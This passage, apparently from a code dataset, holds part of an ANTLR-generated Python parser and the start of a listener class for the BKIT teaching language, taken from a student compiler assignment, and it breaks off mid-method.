self.enterOuterAlt(localctx, 2)\n self.state = 306\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr8\" ):\n return visitor.visitExpr8(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_expr8)\n try:\n self.state = 314\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 309\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 310\n self.match(BKITParser.LEFT_PAREN)\n self.state = 311\n self.expr()\n self.state = 312\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitOperand\" ):\n return visitor.visitOperand(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_operand)\n try:\n self.state = 319\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self.match(BKITParser.ID)\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 317\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 318\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_call\" ):\n return visitor.visitFunction_call(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.match(BKITParser.ID)\n self.state = 322\n self.match(BKITParser.LEFT_PAREN)\n self.state = 333\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 323\n self.expr()\n self.state = 328\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 324\n self.match(BKITParser.COMMA)\n self.state = 325\n self.expr()\n self.state = 330\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 335\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 336\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIndex_op\" ):\n return visitor.visitIndex_op(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_index_op)\n try:\n self.state = 347\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,27,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 338\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 339\n self.expr()\n self.state = 340\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 342\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 343\n self.expr()\n self.state = 344\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 345\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray\" ):\n return visitor.visitArray(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 349\n self.match(BKITParser.ID)\n self.state = 350\n self.match(BKITParser.ASSIGN)\n self.state = 351\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_data\" ):\n return visitor.visitPrimitive_data(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 353\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def array_lit(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Array_litContext)\n else:\n return self.getTypedRuleContext(BKITParser.Array_litContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray_lit\" ):\n return visitor.visitArray_lit(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 355\n self.match(BKITParser.LEFT_BRACE)\n self.state = 370\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 358\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 356\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 357\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 367\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 360\n self.match(BKITParser.COMMA)\n self.state = 363\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 361\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 362\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 369\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 372\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_list\" ):\n return visitor.visitVar_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 62, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 376\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,32,self._ctx)\n if la_ == 1:\n self.state = 374\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 375\n self.var_init()\n pass\n\n\n self.state = 385\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 378\n self.match(BKITParser.COMMA)\n self.state = 381\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.state = 379\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 380\n self.var_init()\n pass\n\n\n self.state = 387\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_init\" ):\n return visitor.visitVar_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 64, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 397\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,36,self._ctx)\n if la_ == 1:\n self.state = 388\n self.match(BKITParser.ID)\n self.state = 392 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 389\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 390\n self.match(BKITParser.INT_LIT)\n self.state = 391\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 394 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 396\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 399\n self.match(BKITParser.ASSIGN)\n self.state = 402\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 400\n self.array_lit()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 401\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_non_init\" ):\n return visitor.visitVar_non_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 66, self.RULE_var_non_init)\n self._la = 0 # Token type\n try:\n self.state = 413\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,39,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 404\n self.match(BKITParser.ID)\n self.state = 408 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 405\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 406\n self.match(BKITParser.INT_LIT)\n self.state = 407\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 410 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 412\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_var\" ):\n return visitor.visitComposite_var(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 415\n self.match(BKITParser.ID)\n self.state = 420 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 416\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 417\n self.expr()\n self.state = 418\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 422 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_init\" ):\n return visitor.visitComposite_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 424\n self.composite_var()\n self.state = 425\n self.match(BKITParser.ASSIGN)\n self.state = 426\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_init\" ):\n return visitor.visitPrimitive_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 428\n self.match(BKITParser.ID)\n self.state = 429\n self.match(BKITParser.ASSIGN)\n self.state = 430\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitParams_list\" ):\n return visitor.visitParams_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 432\n self.var_non_init()\n self.state = 437\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 433\n self.match(BKITParser.COMMA)\n self.state = 434\n self.var_non_init()\n self.state = 439\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[16] = self.expr1_sempred\n self._predicates[17] = self.expr2_sempred\n self._predicates[18] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.6972261667251587, "alphanum_fraction": 0.7021156549453735, "avg_line_length": 29.045198440551758, "blob_id": "29cb49d8097cdd2d47ba83ba5541196eccfbf14b", "content_id": "26045b29f1be557b9c810ac824b28f3c8bfceb15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10635, "license_type": "no_license", "max_line_length": 81, "num_lines": 354, "path": "/Assignments/assignment1/src/forJava/BKITListener.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete listener for a parse tree produced by BKITParser.\nclass BKITListener(ParseTreeListener):\n\n # Enter a parse tree produced by BKITParser#program.\n def enterProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n # Exit a parse tree produced by BKITParser#program.\n def exitProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_declare.\n def enterVar_declare(self, ctx:BKITParser.Var_declareContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_declare.\n def exitVar_declare(self, ctx:BKITParser.Var_declareContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#function_declare.\n def enterFunction_declare(self, ctx:BKITParser.Function_declareContext):\n pass\n\n # Exit a parse tree produced by BKITParser#function_declare.\n def exitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#stmt_list.\n def enterStmt_list(self, ctx:BKITParser.Stmt_listContext):\n pass\n\n # Exit a parse tree produced by BKITParser#stmt_list.\n def exitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#stmt.\n def enterStmt(self, ctx:BKITParser.StmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#stmt.\n def exitStmt(self, ctx:BKITParser.StmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#if_stmt.\n def enterIf_stmt(self, ctx:BKITParser.If_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#if_stmt.\n def exitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_declare_stmt.\n def enterVar_declare_stmt(self, ctx:BKITParser.Var_declare_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_declare_stmt.\n def exitVar_declare_stmt(self, ctx:BKITParser.Var_declare_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#for_stmt.\n def enterFor_stmt(self, ctx:BKITParser.For_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#for_stmt.\n def exitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#while_stmt.\n def enterWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#while_stmt.\n def exitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#dowhile_stmt.\n def enterDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#dowhile_stmt.\n def exitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#assign_stmt.\n def enterAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#assign_stmt.\n def exitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#break_stmt.\n def enterBreak_stmt(self, 